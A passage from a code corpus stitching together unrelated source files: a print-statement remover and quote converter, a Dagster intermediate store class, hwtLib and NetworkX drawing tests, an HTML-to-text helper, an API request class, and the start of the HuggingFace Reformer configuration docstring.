# This condition is used so that we do not check the escape character
# Mainly used for these cases:
# i) If the next character is a backslash
# ii) If the next character is a quote
if data[i] == "\\":
new_file_content += data[i]
i += 1
# If a destination quote occurs in the string escape it
elif data[i] == dest:
new_file_content += "\\"
new_file_content += data[i]
i += 1
new_file_content += dest # Close the string
i += 1
if i < len(data):
new_file_content += data[i]
i += 1
# Check the result if it contains any syntactical errors
if checker(new_file_content, False):
try:
with open(filepath, "w", encoding="utf-8") as file:
file.write(new_file_content)
except UnicodeEncodeError:
return (False, filepath)
return (True, filepath)
else:
return (False, filepath)
def rmv_prints_slave(
filepath: Path,
rmv_main: bool = True,
rmv_root: bool = True,
funcs_to_spare: list = None,
) -> tuple:
    """
    Function that edits the given file in place and removes print statements from it
    Args:
        filepath: A path object pointing to the file to edit
        rmv_main: True if print statements have to be removed from the main function, else False
        rmv_root: True if print statements have to be removed from the global scope (level 0 indentation), else False
        funcs_to_spare: List of functions whose bodies are ignored (their print statements are kept)
    Returns:
        A (status, filepath) tuple, where status is an integer with the following cases:
            0: Print statements could not be removed due to syntactical errors
            1: Print statements were removed from the file successfully
            2: There were no print statements in the file hence, no change
"""
    if funcs_to_spare is None:
funcs_to_spare = list()
# main() is used by many programmers, so for standard puposes we do this
if rmv_main == False:
funcs_to_spare.append("main")
there_are_functions_to_spare = True
if len(funcs_to_spare) == 0:
there_are_functions_to_spare = False
else:
# Get a string in the form of "(func 1|func 2|func 3|....|func n)" to be used in the regex
function_identifiers = "("
for i in range(len(funcs_to_spare)):
function_identifiers += funcs_to_spare[i] + "|"
function_identifiers = function_identifiers[0:-1] + ")"
if rmv_main == False:
re_spare_funcs = re.compile(
r"(if(\(|\s)*__name__\s*==\s*('|\")__main__('|\")(\)|\s)*:)|([ \t]*def[ ]+"
+ function_identifiers
+ r"\s*\(.*\).*?:)",
)
elif there_are_functions_to_spare:
re_spare_funcs = re.compile(
r"[ \t]*def[ ]+" + function_identifiers + r"\s*\(.*\).*?:"
)
if rmv_root == True:
line_contains_print = re.compile(r"[ \t]*print\(")
else:
line_contains_print = re.compile(r"[ \t]+print\(")
# Opening the file and checking for any syntactical errors
try:
with open(filepath, "r", encoding="utf-8") as file:
data = file.readlines()
if not checker(filepath, True):
return (0, filepath)
except UnicodeDecodeError:
return (0, filepath)
current_line = 0
lines_in_file = len(data)
new_file_content = ""
change = False # A variable to know if there were any print statements in file
while current_line < len(data):
# If any comment is encountered
if re.match(comments, data[current_line]):
# Go through the multiline docstring until its end
if re.match(multiline_comments_start_spc, data[current_line]):
end = current_line
cur_comment = data[current_line]
while not re.match(multiline_comments_spc, cur_comment):
end += 1
cur_comment += data[end]
new_file_content += cur_comment
current_line = end
else:
new_file_content += data[current_line]
# If a function definition is encountered and it is a function to be ignored for checking of print statements, skip it
elif there_are_functions_to_spare and re.match(
re_spare_funcs, data[current_line]
):
function_end = re.match(re_spare_funcs, data[current_line]).span()[1]
# Check whether this is not a one-line function
# eg. def a(b): return b*3
if function_end == len(data[current_line]) or re.match(
blank_line, data[current_line][function_end:]
):
# In function body, skip the blank lines and comments to find the indentation of the function
end = current_line + 1
while end < lines_in_file and (
re.match(hash_comments, data[end])
or re.match(blank_line, data[end])
):
end += 1
if end < lines_in_file:
# First ordinary line of function, get the indentation level
indentation = re.match(re_indentation, data[end])
no_of_spaces = len(indentation.group(1))
block_text = re.compile(r"[ \t]{" + str(no_of_spaces) + r",}.")
# Go through the function with the at least the current indentation
while end < lines_in_file and (
re.match(hash_comments, data[end])
or re.match(blank_line, data[end])
or re.match(block_text, data[end])
):
end += 1
new_file_content += "".join(data[current_line:end])
current_line = end - 1
# If a print statement is encountered, remove it
elif re.match(line_contains_print, data[current_line]):
# Print statement is encountered hence, file needs to be changed
change = True
end = current_line
print_statement = re.match(print_checker, data[current_line])
current_print = data[current_line]
# If the print statement is incomplete or a matching bracket is found in the statement,
# check if the print statement is complete
while end < lines_in_file and (
print_statement == None
or checkBrackets(print_statement.group(2)) == False
):
end += 1
current_print += data[end]
print_statement = re.match(print_checker, current_print)
current_line = end
# If all of the above cases are not true, this is a regular line just append it to the file content
else:
new_file_content += data[current_line]
current_line += 1
if checker(new_file_content, False):
# No print in the file was noticed, hence no need to write anything to the file
if not change:
return (2, filepath)
try:
with open(filepath, "w", encoding="utf-8") as file:
file.write(new_file_content)
except UnicodeEncodeError:
return (0, filepath)
return (1, filepath)
else:
return (0, filepath)
if __name__ == "__main__":
convert_quotes_slave(
"C:/Users/DELL/OneDrive/Desktop/wrapup/wrapup/filepath.py",
single=False,
)
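    # A comparable smoke test for rmv_prints_slave; the path reuses the placeholder above
    # and the spared function name is purely illustrative:
    # rmv_prints_slave(
    #     "C:/Users/DELL/OneDrive/Desktop/wrapup/wrapup/filepath.py",
    #     rmv_main=False,
    #     rmv_root=True,
    #     funcs_to_spare=["debug_dump"],
    # )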
|
the-stack_0_6181 | from abc import ABCMeta
import six
from dagster import check
from dagster.core.execution.context.system import SystemPipelineExecutionContext
from dagster.core.types.dagster_type import DagsterType, resolve_dagster_type
from .object_store import FilesystemObjectStore, ObjectStore
from .type_storage import TypeStoragePluginRegistry
class IntermediateStore(six.with_metaclass(ABCMeta)):
def __init__(self, object_store, root_for_run_id, run_id, type_storage_plugin_registry):
self.root_for_run_id = check.callable_param(root_for_run_id, 'root_for_run_id')
self.run_id = check.str_param(run_id, 'run_id')
self.object_store = check.inst_param(object_store, 'object_store', ObjectStore)
self.type_storage_plugin_registry = check.inst_param(
type_storage_plugin_registry, 'type_storage_plugin_registry', TypeStoragePluginRegistry
)
@property
def root(self):
return self.root_for_run_id(self.run_id)
def uri_for_paths(self, paths, protocol=None):
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.key_for_paths(paths)
return self.object_store.uri_for_key(key, protocol)
def key_for_paths(self, paths):
return self.object_store.key_for_paths([self.root] + paths)
def set_object(self, obj, context, dagster_type, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.inst_param(dagster_type, 'dagster_type', DagsterType)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.set_object(
key, obj, serialization_strategy=dagster_type.serialization_strategy
)
def get_object(self, context, dagster_type, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
check.inst_param(dagster_type, 'dagster_type', DagsterType)
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.get_object(
key, serialization_strategy=dagster_type.serialization_strategy
)
def has_object(self, context, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.has_object(key)
def rm_object(self, context, paths):
check.opt_inst_param(context, 'context', SystemPipelineExecutionContext)
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
key = self.object_store.key_for_paths([self.root] + paths)
self.object_store.rm_object(key)
def copy_object_from_prev_run(self, _context, previous_run_id, paths):
check.str_param(previous_run_id, 'previous_run_id')
check.list_param(paths, 'paths', of_type=str)
check.param_invariant(len(paths) > 0, 'paths')
src = self.object_store.key_for_paths([self.root_for_run_id(previous_run_id)] + paths)
dst = self.object_store.key_for_paths([self.root] + paths)
return self.object_store.cp_object(src, dst)
def set_value(self, obj, context, dagster_type, paths):
if self.type_storage_plugin_registry.is_registered(dagster_type):
return self.type_storage_plugin_registry.get(dagster_type.name).set_object(
self, obj, context, dagster_type, paths
)
elif dagster_type.name is None:
self.type_storage_plugin_registry.check_for_unsupported_composite_overrides(
dagster_type
)
return self.set_object(obj, context, dagster_type, paths)
def get_value(self, context, dagster_type, paths):
if self.type_storage_plugin_registry.is_registered(dagster_type):
return self.type_storage_plugin_registry.get(dagster_type.name).get_object(
self, context, dagster_type, paths
)
elif dagster_type.name is None:
self.type_storage_plugin_registry.check_for_unsupported_composite_overrides(
dagster_type
)
return self.get_object(context, dagster_type, paths)
@staticmethod
def paths_for_intermediate(step_key, output_name):
return ['intermediates', step_key, output_name]
def get_intermediate(self, context, step_key, dagster_type, output_name='result'):
return self.get_object(
context=context,
dagster_type=resolve_dagster_type(dagster_type),
paths=self.paths_for_intermediate(step_key, output_name),
)
def has_intermediate(self, context, step_key, output_name='result'):
return self.has_object(
context=context, paths=self.paths_for_intermediate(step_key, output_name)
)
def rm_intermediate(self, context, step_key, output_name='result'):
return self.rm_object(
context=context, paths=self.paths_for_intermediate(step_key, output_name)
)
def build_fs_intermediate_store(root_for_run_id, run_id, type_storage_plugin_registry=None):
return IntermediateStore(
FilesystemObjectStore(),
root_for_run_id,
run_id,
type_storage_plugin_registry
if type_storage_plugin_registry
else TypeStoragePluginRegistry(types_to_register=[]),
)
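# Usage sketch (the storage root and run id below are placeholders):
#
#     store = build_fs_intermediate_store(
#         root_for_run_id=lambda run_id: '/tmp/dagster/storage/' + run_id,
#         run_id='my-run-id')
#     store.has_intermediate(None, 'my_step')   # False until something is stored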
|
the-stack_0_6185 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import ceil
from typing import Dict
import unittest
from hwt.code import Concat
from hwt.hdl.constants import WRITE, READ, NOP
from hwt.hdl.types.bits import Bits
from hwt.simulator.simTestCase import SimTestCase
from hwtLib.examples.operators.concat import SimpleConcat, ConcatAssign, \
ConcatIndexAssignMix0, ConcatIndexAssignMix1, ConcatIndexAssignMix2, \
ConcatIndexAssignMix3
from hwtLib.types.net.arp import arp_ipv4_t
from hwtSimApi.constants import CLK_PERIOD
from pyMathBitPrecise.bit_utils import get_bit, mask
def addValues(unit, data):
for d in data:
# because there are 4 bits
for i in range(4):
databit = getattr(unit, f"a{i:d}")
if d is None:
dataBitval = None
else:
dataBitval = get_bit(d, i)
databit._ag.data.append(dataBitval)
class ConcatTC(SimTestCase):
def tearDown(self):
self.rmSim()
SimTestCase.tearDown(self)
def test_join(self):
u = SimpleConcat()
self.compileSimAndStart(u)
# addValues(u, [0, 1, 2, 4, 8, (1 << 4) - 1, None, 3, 2, 1])
addValues(u, [2, 4, (1 << 4) - 1, None, 3, 2, 1])
self.runSim(7 * CLK_PERIOD)
self.assertValSequenceEqual(u.a_out._ag.data,
[2, 4, 15, None, 3, 2, 1])
def test_assign(self):
u = ConcatAssign()
self.compileSimAndStart(u)
N = 4
a = [[] for _ in range(N)]
for i in range(N):
for i2, bit_ref_vals in enumerate(a):
bit_ref_vals.append(int(i == i2))
u.a_in._ag.data.append(1 << i)
self.runSim(N * CLK_PERIOD)
for i, bit_ref_vals in enumerate(a):
data = getattr(u, f'a{i:d}')._ag.data
self.assertValSequenceEqual(data, bit_ref_vals)
def test_ConcatIndexAssignMix0(self):
u = ConcatIndexAssignMix0()
self.compileSimAndStart(u)
N = 4
a = [[] for _ in range(N)]
for i in range(N):
for i2, bit_ref_vals in enumerate(a):
bit_ref_vals.append(int(i == i2))
v = 1 << i
u.a[0]._ag.data.append(v & 0x3)
u.a[1]._ag.data.append((v >> 2) & 0x3)
self.runSim(N * CLK_PERIOD)
for i, bit_ref_vals in enumerate(a):
data = u.b[i]._ag.data
self.assertValSequenceEqual(data, bit_ref_vals)
def test_ConcatIndexAssignMix1(self):
u = ConcatIndexAssignMix1()
self.compileSimAndStart(u)
N = 4
b = [[] for _ in range(2)]
for i in range(N):
for i2, a in enumerate(u.a):
a._ag.data.append(int(i == i2))
v = 1 << i
b[0].append(v & 0x3)
b[1].append((v >> 2) & 0x3)
self.runSim(N * CLK_PERIOD)
for i, ref_vals in enumerate(b):
self.assertValSequenceEqual(u.b[i]._ag.data, ref_vals)
def test_ConcatIndexAssignMix2(self):
u = ConcatIndexAssignMix2()
self.compileSimAndStart(u)
N = 8
b = [[] for _ in range(2)]
for i in range(N):
offset = 0
v = 1 << i
for a in u.a:
w = a._dtype.bit_length()
a._ag.data.append((v >> offset) & mask(w))
offset += w
b[0].append(v & 0xf)
b[1].append((v >> 4) & 0xf)
self.runSim(N * CLK_PERIOD)
for i, ref_vals in enumerate(b):
self.assertValSequenceEqual(u.b[i]._ag.data, ref_vals)
def _ConcatIndexAssignMix3_py_val_to_words(self, v:Dict[str, int], W: int, WORD_CNT: int):
d = arp_ipv4_t.from_py(v)
padding_w = WORD_CNT * 24 - W
d_words = Concat(Bits(padding_w).from_py(0), d._reinterpret_cast(Bits(W)))\
._reinterpret_cast(Bits(24)[WORD_CNT])
return d_words
def test_ConcatIndexAssignMix3(self):
u = ConcatIndexAssignMix3()
self.compileSimAndStart(u)
W = arp_ipv4_t.bit_length()
WORD_CNT = ceil(W / 24)
D1 = self._ConcatIndexAssignMix3_py_val_to_words(
{f.name: i + 1 for i, f in enumerate(arp_ipv4_t.fields)}, W, WORD_CNT)
u.port._ag.requests.extend([
NOP, NOP,
*((READ, i) for i in range(WORD_CNT)),
*((WRITE, i, v) for i, v in enumerate(D1)),
*((READ, i) for i in range(WORD_CNT)),
])
self.runSim((len(u.port._ag.requests) + 4) * CLK_PERIOD)
D0 = self._ConcatIndexAssignMix3_py_val_to_words(
{f.name: i for i, f in enumerate(arp_ipv4_t.fields)}, W, WORD_CNT)
r_data = list(u.port._ag.r_data)
self.assertValSequenceEqual(r_data[0:WORD_CNT] + r_data[2 * WORD_CNT:], [int(d) for d in (list(D0) + list(D1))])
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(IndexingTC('test_rangeJoin'))
suite.addTest(unittest.makeSuite(ConcatTC))
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
|
the-stack_0_6187 | """Unit tests for matplotlib drawing functions."""
import os
import itertools
import pytest
mpl = pytest.importorskip("matplotlib")
mpl.use("PS")
plt = pytest.importorskip("matplotlib.pyplot")
plt.rcParams["text.usetex"] = False
import networkx as nx
barbell = nx.barbell_graph(4, 6)
def test_draw():
try:
functions = [
nx.draw_circular,
nx.draw_kamada_kawai,
nx.draw_planar,
nx.draw_random,
nx.draw_spectral,
nx.draw_spring,
nx.draw_shell,
]
options = [{"node_color": "black", "node_size": 100, "width": 3}]
for function, option in itertools.product(functions, options):
function(barbell, **option)
plt.savefig("test.ps")
finally:
try:
os.unlink("test.ps")
except OSError:
pass
def test_draw_shell_nlist():
try:
nlist = [list(range(4)), list(range(4, 10)), list(range(10, 14))]
nx.draw_shell(barbell, nlist=nlist)
plt.savefig("test.ps")
finally:
try:
os.unlink("test.ps")
except OSError:
pass
def test_edge_colormap():
colors = range(barbell.number_of_edges())
nx.draw_spring(
barbell,
edge_color=colors,
width=4,
edge_cmap=plt.cm.Blues,
with_labels=True,
)
# plt.show()
def test_arrows():
nx.draw_spring(barbell.to_directed())
# plt.show()
def test_edge_colors_and_widths():
pos = nx.circular_layout(barbell)
for G in (barbell, barbell.to_directed()):
nx.draw_networkx_nodes(G, pos, node_color=[(1.0, 1.0, 0.2, 0.5)])
nx.draw_networkx_labels(G, pos)
# edge with default color and width
nx.draw_networkx_edges(G, pos, edgelist=[(0, 1)], width=None, edge_color=None)
# edges with global color strings and widths in lists
nx.draw_networkx_edges(
G, pos, edgelist=[(0, 2), (0, 3)], width=[3], edge_color=["r"]
)
# edges with color strings and widths for each edge
nx.draw_networkx_edges(
G, pos, edgelist=[(0, 2), (0, 3)], width=[1, 3], edge_color=["r", "b"]
)
# edges with fewer color strings and widths than edges
nx.draw_networkx_edges(
G,
pos,
edgelist=[(1, 2), (1, 3), (2, 3), (3, 4)],
width=[1, 3],
edge_color=["g", "m", "c"],
)
# edges with more color strings and widths than edges
nx.draw_networkx_edges(
G,
pos,
edgelist=[(3, 4)],
width=[1, 2, 3, 4],
edge_color=["r", "b", "g", "k"],
)
# with rgb tuple and 3 edges - is interpreted with cmap
nx.draw_networkx_edges(
G, pos, edgelist=[(4, 5), (5, 6), (6, 7)], edge_color=(1.0, 0.4, 0.3)
)
# with rgb tuple in list
nx.draw_networkx_edges(
G, pos, edgelist=[(7, 8), (8, 9)], edge_color=[(0.4, 1.0, 0.0)]
)
        # with rgba tuple and 4 edges - is interpreted with cmap
nx.draw_networkx_edges(
G,
pos,
edgelist=[(9, 10), (10, 11), (10, 12), (10, 13)],
edge_color=(0.0, 1.0, 1.0, 0.5),
)
# with rgba tuple in list
nx.draw_networkx_edges(
G,
pos,
edgelist=[(9, 10), (10, 11), (10, 12), (10, 13)],
edge_color=[(0.0, 1.0, 1.0, 0.5)],
)
# with color string and global alpha
nx.draw_networkx_edges(
G, pos, edgelist=[(11, 12), (11, 13)], edge_color="purple", alpha=0.2
)
# with color string in a list
nx.draw_networkx_edges(
G, pos, edgelist=[(11, 12), (11, 13)], edge_color=["purple"]
)
# with single edge and hex color string
nx.draw_networkx_edges(G, pos, edgelist=[(12, 13)], edge_color="#1f78b4f0")
# edge_color as numeric using vmin, vmax
nx.draw_networkx_edges(
G,
pos,
edgelist=[(7, 8), (8, 9)],
edge_color=[0.2, 0.5],
edge_vmin=0.1,
edge_vmax=0.6,
)
# plt.show()
def test_labels_and_colors():
G = nx.cubical_graph()
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(
G, pos, nodelist=[0, 1, 2, 3], node_color="r", node_size=500, alpha=0.75
)
nx.draw_networkx_nodes(
G,
pos,
nodelist=[4, 5, 6, 7],
node_color="b",
node_size=500,
alpha=[0.25, 0.5, 0.75, 1.0],
)
# edges
nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(0, 1), (1, 2), (2, 3), (3, 0)],
width=8,
alpha=0.5,
edge_color="r",
)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(4, 5), (5, 6), (6, 7), (7, 4)],
width=8,
alpha=0.5,
edge_color="b",
)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(4, 5), (5, 6), (6, 7), (7, 4)],
min_source_margin=0.5,
min_target_margin=0.75,
width=8,
edge_color="b",
)
# some math labels
labels = {}
labels[0] = r"$a$"
labels[1] = r"$b$"
labels[2] = r"$c$"
labels[3] = r"$d$"
labels[4] = r"$\alpha$"
labels[5] = r"$\beta$"
labels[6] = r"$\gamma$"
labels[7] = r"$\delta$"
nx.draw_networkx_labels(G, pos, labels, font_size=16)
nx.draw_networkx_edge_labels(G, pos, edge_labels=None, rotate=False)
nx.draw_networkx_edge_labels(G, pos, edge_labels={(4, 5): "4-5"})
# plt.show()
def test_axes():
fig, ax = plt.subplots()
nx.draw(barbell, ax=ax)
nx.draw_networkx_edge_labels(barbell, nx.circular_layout(barbell), ax=ax)
def test_empty_graph():
G = nx.Graph()
nx.draw(G)
def test_draw_empty_nodes_return_values():
# See Issue #3833
import matplotlib.collections # call as mpl.collections
G = nx.Graph([(1, 2), (2, 3)])
DG = nx.DiGraph([(1, 2), (2, 3)])
pos = nx.circular_layout(G)
assert isinstance(
nx.draw_networkx_nodes(G, pos, nodelist=[]), mpl.collections.PathCollection
)
assert isinstance(
nx.draw_networkx_nodes(DG, pos, nodelist=[]), mpl.collections.PathCollection
)
# drawing empty edges used to return an empty LineCollection or empty list.
# Now it is always an empty list (because edges are now lists of FancyArrows)
assert nx.draw_networkx_edges(G, pos, edgelist=[], arrows=True) == []
assert nx.draw_networkx_edges(G, pos, edgelist=[], arrows=False) == []
assert nx.draw_networkx_edges(DG, pos, edgelist=[], arrows=False) == []
assert nx.draw_networkx_edges(DG, pos, edgelist=[], arrows=True) == []
def test_multigraph_edgelist_tuples():
# See Issue #3295
G = nx.path_graph(3, create_using=nx.MultiDiGraph)
nx.draw_networkx(G, edgelist=[(0, 1, 0)])
nx.draw_networkx(G, edgelist=[(0, 1, 0)], node_size=[10, 20, 0])
def test_alpha_iter():
pos = nx.random_layout(barbell)
# with fewer alpha elements than nodes
plt.subplot(131)
nx.draw_networkx_nodes(barbell, pos, alpha=[0.1, 0.2])
# with equal alpha elements and nodes
num_nodes = len(barbell.nodes)
alpha = [x / num_nodes for x in range(num_nodes)]
colors = range(num_nodes)
plt.subplot(132)
nx.draw_networkx_nodes(barbell, pos, node_color=colors, alpha=alpha)
# with more alpha elements than nodes
alpha.append(1)
plt.subplot(133)
nx.draw_networkx_nodes(barbell, pos, alpha=alpha)
def test_error_invalid_kwds():
with pytest.raises(ValueError, match="Received invalid argument"):
nx.draw(barbell, foo="bar")
def test_np_edgelist():
# see issue #4129
np = pytest.importorskip("numpy")
nx.draw_networkx(barbell, edgelist=np.array([(0, 2), (0, 3)]))
def test_draw_nodes_missing_node_from_position():
G = nx.path_graph(3)
pos = {0: (0, 0), 1: (1, 1)} # No position for node 2
with pytest.raises(nx.NetworkXError, match="has no position"):
nx.draw_networkx_nodes(G, pos)
# NOTE: parametrizing on marker to test both branches of internal
# nx.draw_networkx_edges.to_marker_edge function
@pytest.mark.parametrize("node_shape", ("o", "s"))
def test_draw_edges_min_source_target_margins(node_shape):
"""Test that there is a wider gap between the node and the start of an
incident edge when min_source_margin is specified.
    This test checks that the use of the min_{source/target}_margin kwargs results
    in shorter edges (i.e. more padding) between the edge and the source and target nodes.
As a crude visual example, let 's' and 't' represent source and target
nodes, respectively:
Default:
s-----------------------------t
With margins:
s ----------------------- t
"""
# Create a single axis object to get consistent pixel coords across
# multiple draws
fig, ax = plt.subplots()
G = nx.Graph([(0, 1)])
pos = {0: (0, 0), 1: (1, 0)} # horizontal layout
# Get leftmost and rightmost points of the FancyArrowPatch object
# representing the edge between nodes 0 and 1 (in pixel coordinates)
default_patch = nx.draw_networkx_edges(G, pos, ax=ax, node_shape=node_shape)[0]
default_extent = default_patch.get_extents().corners()[::2, 0]
# Now, do the same but with "padding" for the source and target via the
# min_{source/target}_margin kwargs
padded_patch = nx.draw_networkx_edges(
G,
pos,
ax=ax,
node_shape=node_shape,
min_source_margin=100,
min_target_margin=100,
)[0]
padded_extent = padded_patch.get_extents().corners()[::2, 0]
# With padding, the left-most extent of the edge should be further to the
# right
assert padded_extent[0] > default_extent[0]
# And the rightmost extent of the edge, further to the left
assert padded_extent[1] < default_extent[1]
def test_nonzero_selfloop_with_single_node():
"""Ensure that selfloop extent is non-zero when there is only one node."""
# Create explicit axis object for test
fig, ax = plt.subplots()
# Graph with single node + self loop
G = nx.Graph()
G.add_node(0)
G.add_edge(0, 0)
# Draw
patch = nx.draw_networkx_edges(G, {0: (0, 0)})[0]
# The resulting patch must have non-zero extent
bbox = patch.get_extents()
assert bbox.width > 0 and bbox.height > 0
# Cleanup
plt.delaxes(ax)
def test_nonzero_selfloop_with_single_edge_in_edgelist():
"""Ensure that selfloop extent is non-zero when only a single edge is
specified in the edgelist.
"""
# Create explicit axis object for test
fig, ax = plt.subplots()
# Graph with selfloop
G = nx.path_graph(2)
G.add_edge(1, 1)
pos = {n: (n, n) for n in G.nodes}
# Draw only the selfloop edge via the `edgelist` kwarg
patch = nx.draw_networkx_edges(G, pos, edgelist=[(1, 1)])[0]
# The resulting patch must have non-zero extent
bbox = patch.get_extents()
assert bbox.width > 0 and bbox.height > 0
# Cleanup
plt.delaxes(ax)
def test_apply_alpha():
"""Test apply_alpha when there is a mismatch between the number of
supplied colors and elements.
"""
nodelist = [0, 1, 2]
colorlist = ["r", "g", "b"]
alpha = 0.5
rgba_colors = nx.drawing.nx_pylab.apply_alpha(colorlist, alpha, nodelist)
assert all(rgba_colors[:, -1] == alpha)
|
the-stack_0_6188 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
author: http://stackoverflow.com/users/476920/xperroni
"""
from HTMLParser import HTMLParser
from re import sub
from sys import stderr
from traceback import print_exc
class _DeHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.__text = []
def handle_data(self, data):
text = data.strip()
if len(text) > 0:
text = sub('[ \t\r\n]+', ' ', text)
self.__text.append(text + ' ')
def handle_starttag(self, tag, attrs):
if tag == 'p':
self.__text.append('\n\n')
elif tag == 'br':
self.__text.append('\n')
def handle_startendtag(self, tag, attrs):
if tag == 'br':
self.__text.append('\n\n')
def text(self):
return ''.join(self.__text).strip()
def dehtml(text):
try:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.text()
except:
print_exc(file=stderr)
return text
def main():
text = r'''
Picasa工具箱Tool for Picasa Google+ Photo是目前最好的Picasa管理器,只是感觉Picasa有些过时了... <span style="color: #999">点评来自 <a
href="/u/97100">@tastypear
'''
print(dehtml(text))
if __name__ == '__main__':
main()
|
the-stack_0_6189 | '''
Created by yong.huang on 2016.11.04
'''
from hifive.api.base import RestApi
class HFClearMemberSheetMusicRequest(RestApi):
def __init__(self, domain=None, port=80, method=None):
        domain = domain or 'hifive-gateway-test.hifiveai.com'
        method = method or 'POST'
RestApi.__init__(self,domain, port,method)
self.accessToken = None
self.sheetId = None
def getapiname(self):
return 'ClearMemberSheetMusic'
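# Hedged usage sketch (not part of the original file): building the request and
# setting its fields. The token and sheet id values come from the caller, and the
# actual send/execute call is defined on RestApi elsewhere, so it is not shown here.
def _example_build_request(token, sheet_id):
    req = HFClearMemberSheetMusicRequest()
    req.accessToken = token
    req.sheetId = sheet_id
    return req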
|
the-stack_0_6190 | # coding=utf-8
# Copyright 2020 The Trax Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Reformer model configuration """
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
REFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"google/reformer-crime-and-punishment": "https://cdn.huggingface.co/google/reformer-crime-and-punishment/config.json",
"google/reformer-enwik8": "https://cdn.huggingface.co/google/reformer-enwik8/config.json",
}
class ReformerConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a :class:`~transformers.ReformerModel`. It is used to
instantiate a Reformer model according to the specified arguments, defining the model architecture.
Configuration objects inherit from :class:`~transformers.PretrainedConfig` and can be used to control the model
outputs. Read the documentation from :class:`~transformers.PretrainedConfig` for more information.
Args:
attention_head_size (:obj:`int`, `optional`, defaults to 64):
Dimensionality of the projected key, query and value vectors
attn_layers (:obj:`List[str]`, `optional`, defaults to :obj:`["local", "lsh", "local", "lsh", "local", "lsh"]`):
List of attention layer types in ascending order. It can be chosen between a LSHSelfAttention layer
(:obj:`"lsh"`) and a LocalSelfAttention layer (:obj:`"local"`).
For more information on LSHSelfAttention layer, see `LSH Self Attention
<reformer.html#lsh-self-attention>`__. For more information on LocalSelfAttention layer, see `Local Self
Attention <reformer.html#local-sensitive-hashing-self-attention>`__.
axial_pos_embds (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to use axial position embeddings. For more information on how axial position embeddings
work, see `Axial Position Encodings <reformer.html#axial-positional-encodings>`__.
axial_norm_std (:obj:`float`, `optional`, defaults to 1.0):
The standard deviation of the normal_initializer for initializing the weight matrices of the axial
positional encodings.
axial_pos_shape (:obj:`List[int]`, `optional`, defaults to :obj:`[64, 64]`):
The position dims of the axial position encodings. During training the product of the position dims has to
be equal to the sequence length.
For more information on how axial position embeddings work, see `Axial Position Encodings
<reformer.html#axial-positional-encodings>`__.
axial_pos_embds_dim (:obj:`List[int]`, `optional`, defaults to :obj:`[64, 192]`):
The embedding dims of the axial position encodings. The sum of the embedding dims has to be equal to the
hidden size.
For more information on how axial position embeddings work, see `Axial Position Encodings
<reformer.html#axial-positional-encodings>`__.
chunk_size_lm_head (:obj:`int`, `optional`, defaults to 0):
The chunk size of the final language model feed forward head layer. A chunk size of 0 means that the feed
forward layer is not chunked. A chunk size of n means that the feed forward layer processes n <
sequence_length embeddings at a time.
For more information on feed forward chunking, see `How does Feed Forward Chunking work?
<../glossary.html#feed-forward-chunking>`__.
eos_token_id (:obj:`int`, `optional`, defaults to 2):
The token id for the end-of-sentence token.
feed_forward_size (:obj:`int`, `optional`, defaults to 512):
Dimensionality of the feed_forward layer in the residual attention block.
hash_seed (:obj:`int`, `optional`):
Seed that can be used to make local sensitive hashing in :obj:`LSHSelfAttention` deterministic. This should
only be set for testing purposed. For evaluation and training purposes :obj:`hash_seed` should be left as
:obj:`None` to ensure fully random rotations in local sensitive hashing scheme.
hidden_act (:obj:`str` or :obj:`Callable`, `optional`, defaults to :obj:`"relu"`):
The non-linear activation function (function or string) in the feed forward layer in the residual attention
block. If string, :obj:`"gelu"`, :obj:`"relu"`, :obj:`"silu"` and :obj:`"gelu_new"` are supported.
hidden_dropout_prob (:obj:`float`, `optional`, defaults to 0.05):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
hidden_size (:obj:`int`, `optional`, defaults to 256):
Dimensionality of the output hidden states of the residual attention blocks.
initializer_range (:obj:`float`, `optional`, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
is_decoder (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether ot not to use a causal mask in addition to the :obj:`attention_mask` passed to
:class:`~transformers.ReformerModel`. When using the Reformer for causal language modeling, this argument
should be set to :obj:`True`.
layer_norm_eps (:obj:`float`, `optional`, defaults to 1e-12):
The epsilon used by the layer normalization layers.
        local_attn_chunk_length (:obj:`int`, `optional`, defaults to 64):
Length of chunk which attends to itself in :obj:`LocalSelfAttention`. Chunking reduces memory complexity
from sequence length x sequence length (self attention) to chunk length x chunk length x sequence length /
chunk length (chunked self attention).
